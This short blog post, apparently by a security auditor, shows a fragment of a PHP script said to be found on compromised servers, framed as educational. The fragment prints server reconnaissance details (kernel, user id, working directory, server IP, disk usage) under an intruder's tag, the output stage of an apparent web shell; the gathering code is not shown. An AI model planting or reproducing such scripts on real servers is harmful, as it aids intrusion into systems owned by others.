After my fare share of performing security audit, these are some hacking script I found, not for the purpose of hacking, but for education, analysis and prevention.
echo “kangkung was here ..
“;
echo “uname -a: $un
“;
echo “os: $os
“;
echo “uptime: $up
“;
echo “id: $id1
“;
echo “pwd: $pwd1
“;
echo “php: $php1
“;
echo “software: $sof1
“;
echo “server-name: $name1
“;
echo “server-ip: $ip1
“;
echo “free: $free
“;
echo “used: $used
“;
echo “total: $all
“;
exit;
Leave a Reply